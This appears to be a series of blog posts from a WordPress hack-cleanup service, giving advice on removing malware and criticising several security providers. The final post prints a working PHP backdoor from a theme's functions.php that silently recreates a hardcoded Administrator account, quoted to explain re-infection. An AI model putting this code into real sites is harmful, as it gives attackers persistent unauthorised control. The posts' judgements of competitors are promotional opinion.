How to Safely Remove Malware From a WordPress Website

If you have malware on your WordPress website, you are not having a great time and you don’t want to make the situation worse by causing more problems when removing it. From our years of cleaning up hacked WordPress websites and dealing with the aftermath of others not doing a good job of that, there are some important tips we can share.

Make a Backup of Everything First

Before making any changes to the website, make a backup of everything. That usually means making a backup of the files on the website and the database. That way, if a removal effort goes wrong, you can always revert back to where you were before it. It’s worth the time to do this before doing anything else.

We wouldn’t recommend doing this with a WordPress backup plugin, as those can be less reliable methods to generate a backup.

Don’t Overwrite the Website with a Backup You Think is Clean

One common suggestion to deal with a malware infected WordPress website is to revert to a clean backup of the website. There are a couple of common problems with that. First, often you won’t know if the backup is clean, as you probably don’t know when the hack started, only when you noticed it. Second, if you overwrite the files on the website, you can end up with the new malicious files still being on the website. You need to make sure you clear everything out first and put the backup files on the website, instead of overwriting the files. If you overwrite the files, you can also have other problems with files existing that shouldn’t exist together.

Make Sure The Person Removing the Malware Knows What They Are Doing

While it would seem fairly obvious to say you should hire someone experienced in dealing with removing malware from WordPress websites to clean it up, the reality is that there are lots and lots of providers who are not doing things right. You might get lucky and hire someone like us who does things right, but there is a good chance you will hire some who won’t. So either make sure that the provider not only removes the malware but also tries to secure things as much as possible, and most importantly, tries to determine how the website was hacked. If a provider doesn’t emphasize that they do the last element, they should be avoided.

If you are looking to do it yourself, there are lots of guides out there on doing that, though, from what we have seen, that don’t do a good job. A lot of them look to be there to ultimately get you to hire the source of the guide after their advice doesn’t work. Others are written by people that don’t appear to have experience actually dealing with removing malware. Either way, you might get lucky with their advice, but you might not, leading to more work needing to be done.

Try to Figure Out How the Malware Got There

If you remove all the malware, but the source of the infection isn’t addressed, you can quickly have malware on the website again. This is something that often isn’t done, including with lots malware removal services. One of the reasons we know that is that when we are brought in to re-clean malware infected websites, we check the logging and often find that it shows malicious files being accessed that were missed in the previous cleanup.

Malware Didn’t Get on Your Website Through a WordPress Update

When it comes to figuring out how websites have been infected with malware or otherwise hacked, people often assume something that happened around the same time as they became aware of the hack caused it. There are a couple of big problems with that. First, as the saying goes, correlation isn’t causation. Second, the start of the hacking can have been well before it is noticed.

Another problem that comes up is that people can come up with fairly improbable possible causes. We recently interacted with someone suggesting that an update to WordPress introduced malware on to their website. If that were something that was occurring, it would be big news. In their case, there wasn’t even a correlation, as they knew about the malware and were having cleaned six days before the update.

A post we wrote recently explains the basics of trying to determine how a website was actually hacked.

Sucuri and MalCare Don’t Address the Source of Hacked Websites, Leading to Results Like This

Earlier in the week, we were mentioning that many hack cleanup providers don’t do the essential work of trying to figure out how websites were hacked. If you hire one of them, you might get lucky, and that doesn’t matter because the hacker hit the website once and moved on, but with more persistent hackers, that isn’t going to work out. Here is a fresh example of that involving two of those providers, Sucuri and MalCare:

A WordPress site I work for hosted on WPEngine has suffered from a malware attack. The attack was noticed when a consent management pop up started appearing on the home page. WPEngine’s security team from Sucuri hasn’t been much help as they’ve scanned and “removed” the problem 5 times now. I’ve also used a premium service from MalCare which did basically what Sucuri did, scanned said “it’s fixed” and then it came back.

That person tried a lot of things to deal with this:

I have enabled a number of security features including disabling enumeration, 2FA, custom wp login url, automatic password lockout after 2 tries, changing file permissions on certain files, enabled automatic alerts on file changing or file addition, deleted non essential users, changed passwords to all current users multiple times…

What they really need is to bring someone in who will work through trying to figure out how the hacking is continuing, addressing that, and trying to figure out how it started.

If you are in need of someone who will actually do that work, we do that for WordPress websites and other types of website.

The Location of Malware on a Website Probably Won’t Show Source of the Hack

It isn’t uncommon to see people claiming that certain software is the cause of their website being hacked based solely on malicious code being found in a file from the software. In reality, the files being impacted by malware usually have no connection with the cause of the hack. Instead, once the hacker has the ability to modify existing files, they can usually change any files. Sometimes hackers will modify all the files of a certain type. Other times, they will modify random files. They may also add new files in random locations.

There is one major exception to this. If a hacker gains access to the website through a vulnerability that allows uploading files to a certain location, then finding malicious files there is a strong indication that was the cause.

While the location of malicious code likely doesn’t tell you how the website was hacked, log files can go a long way to telling you that. That depends on having logging for the method of access the hacker used and that logging being available for when the website was hacked. If a hacker got in through FTP access, but you don’t have a log of that, then you are out of luck. If the hacker originally gotten in months ago, but the hack was only spotted recently, there is a good chance that logging is no longer available.

Even if you have logging available that would show the source of the hack, you need to be able to pick that out of the logging data. That is where having someone that deals with doing that on a regular basis will produce better results than trying to review the logging yourself.

Why Your Website is Broken or Down After Having Automated Malware Removal Done

It isn’t uncommon to see people complaining about their websites being broken or down after having a malware removal service deal with malware that had been on the website. If the website wasn’t having that problem before the malware was removed, the cause of this is likely the usage of automated malware removal without careful supervision to make sure that all the added code is removed, while not removing any preexisting code.

To give an example of how things get messed up, take a website we saw after automated malware removal was done. At the top of the website’s pages was “?>”. For those not familiar with PHP coding, that is the end tag for PHP code. What probably happened is that there was code added to the beginning of a file that looks like this (with “malicious code” filling in for the actual malicious code):

<?php “malicious code” ?>

The automated malware removal then removed ‘<?php “malicious code”‘, but left the last part.

Depending on what has been damaged, fixing this can be relatively easy or rather hard.

Before making any more changes, make sure to make a backup of anything that is going to be changed. Worst case, you can revert back to where you started before trying to deal with this.

Whoever did the malware removal really should address this, but if this is an obvious issue across the website, they clearly are not too concerned about the quality of their work, so you may not want them making more changes.

If you don’t feel comfortable handling this yourself, a good web developer should be able to addressing this for you.

It Shouldn’t Take SiteLock Days to Remove Malware From a Hacked WordPress Website

In dealing with hacked websites, a company that we used to have come up a lot in conversations with clients was SiteLock. There have been many problems we have run across with them in past years. We were contacted this week by someone dealing with them after malware was detected on their website by Bluehost. Bluehost gets paid by SiteLock if you hire SiteLock to clean up the website, which is why they promote hiring them to clean it up. It isn’t because SiteLock does a good job of it.

That was on display with what this person was dealing with this week. They were now on the fifth day of SiteLock working on removing the malware from their hacked WordPress website (or at least they were supposed to be working on it). It shouldn’t take that long. It usually should take a few hours to do that clean up. At least when we are cleaning up a hacked WordPress website, that is how long it takes. That is with us doing a proper cleanup, whereas lots of providers, including SiteLock in our past experience, don’t do, so it should take less time than that.

We don’t have good advice to give to those who have already hired SiteLock. But for those that haven’t, the best advice is to avoid them.

If someone else has good advice for those who have hired them and are experiencing problems, leave a comment below.

Wordfence Security Daily Malware Scans Are Not the Way to Clean Up a Malware Infection of a WordPress Website

If your WordPress website has been hacked and contains malware, a common suggestion for cleaning it up is to use the Wordfence Security plugin. There are a number of problems with that. One being that it won’t necessarily catch all the malware, as someone looking for help with the plugin recently noted:

Hello, I’m using the free version and I’m doing daily scans because my site has a malware. At some point the scan did not detect some new folders that have been created in the root folder.

The folders has some random characters as an name and it contains an index file and a cache folder.

The larger problem with what they were bringing up there is that if you had cleaned up the malware, there wouldn’t even be more malware to possibly detect day after day. So something has gone wrong there.

If there is malware on a WordPress website, the focus shouldn’t be on removing the malware, though it does need to be removed. It should be how it got there, which is something that Wordfence Security can’t determine. When the plugin removes the files without determining that, it makes it harder to figure out.

Another important reason for trying to figure out how the website was infected, which have seen over and over in years of being brought in to re-clean hacked WordPress websites, is that in doing the work to try to figure out how the website was hacked, you often find malware or other malicious code that otherwise would have been missed.

Figuring out how the malware got there in the first place or at least stopping it from getting back in basic part of a proper hack cleanup, but something that many security providers, including the developer of Wordfence Security, either don’t do or fail to accomplish.

Wordfence Care Failed to Resolve Reoccurring Malware Issue on WordPress Website

When it comes to cleaning up hacked WordPress websites, the most important part of doing that is often not done. That being trying to figure out how the website was hacked and fixing that. Sometimes you can get away with failing to do that, other times the problem is going to come back again and again.

As an example of that, take someone who was looking for help with a hacked WordPress website recently from the developer of the Wordfence Security plugin. They wrote that they had done the following:

Steps I have taken so far:

  1. Scanned my website using a security plugin, but the malware continues to reappear.
  2. Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin files manually from the respective directories.
  3. Checked theme files for suspicious code and removed any identified malicious snippets.
  4. Updated WordPress, themes, and plugins to their latest versions.
  5. Changed all passwords related to my website, including admin, FTP, and database.

But that hadn’t resolved the issue:

Despite these efforts, the malware keeps reappearing, and I’m unable to find the source of the infection.

They rightly understood the need to figure out the source of the infection, which notably is something that many malware cleanup services for WordPress websites don’t do. We know they don’t do that because we are often brought in to re-clean hacked WordPress websites where that wasn’t done before and doing that shows that in addition to not finding the source of the infection; the provider missed parts of the malware currently on the website.

The response from the developer didn’t provide helpful information, but it did promote hiring them to clean up the website. According to the poster they tried that, getting the Wordfence Care service, but that didn’t help:

I already got the Wordfence Care, but you still can’t give the permanent solution for me.

The results from the more expensive Wordfence Response don’t appear to be better.

WordPress Security Plugins Won’t Fully Disinfect a Hacked WordPress Website

When it comes to cleaning up hacked WordPress websites, there is a lot of advice suggesting solutions that are easy, but don’t properly address the situation. That leads to continuing issues that could have been addressed quickly if handled by a professional like us.

As an example of what not to do, take a recent post from the WordPress Support Forum, where someone claimed to have done a full disinfection of a website, which hadn’t worked:

Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.

One thing missing there is trying to figure out how the website was hacked. That is important for multiple reasons. One of them being that if you don’t know how the website was hacked, then you can’t be sure the issue has been addressed and won’t happen again. Another reason is that if you don’t know how the website was hacked, then you also likely don’t know when it was hacked. Restoring a backup file won’t clear out malicious code, if the malicious code is in the backup as well.

Another issue is that they were trying to find malicious code using several WordPress security plugins, which didn’t find it:

This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S[ecurity], All-In-One Security (AIOS), and Anti-Malware Security and Brute-Force Firewall. None have detected it.

While they are claiming the code was invisible, their description of it tells a different story:

A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.

It is only shown when loading certain pages in the browser code inside (it is not always shown…)

During a proper cleanup, theme files would be checked and before even starting on a hack cleanup, a professional should have noticed the code was being loaded on the website (even though the subsequent code loaded would only occur in some instances). A professional would have been looking for the code before starting, as often people think that some other issue with a website is a hack. So they want to make sure a hack cleanup is needed before starting.

Automated malware detection doesn’t work well, as it both fails to detect plenty of malicious code (as occurred here) and also flags legitimate code as being malicious.

How Another Hacker Was Able to Re-Add a Malicious User to a Hacked WordPress Site

In October, we wrote about how a hacker was able to re-add a malicious user to a hacked WordPress site using a database trigger. That isn’t the only way they can do that, as we found while working on cleaning up a hacked WordPress website recently. In this situation, as soon as a malicious Administrator account was deleted, a new account with the same account information would be created. The cause was code added to the end of the functions.php file for the theme currently in use on the website.

That code was as follows:

add_action( 'init', function () {
$username = 'kshivvamaster';
$password = 'Admin@2020';
$email_address = '';
if ( ! username_exists( $username ) ) {
$user_id = wp_create_user( $username, $password, $email_address );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
} );

The first line causes the rest of the code to run whenever WordPress loads. The rest of the code checks if the username “kshivvamaster” exists. If it doesn’t exist, it creates a new account with that username along with the specified password and email address in the code. That account is given the Administrator role.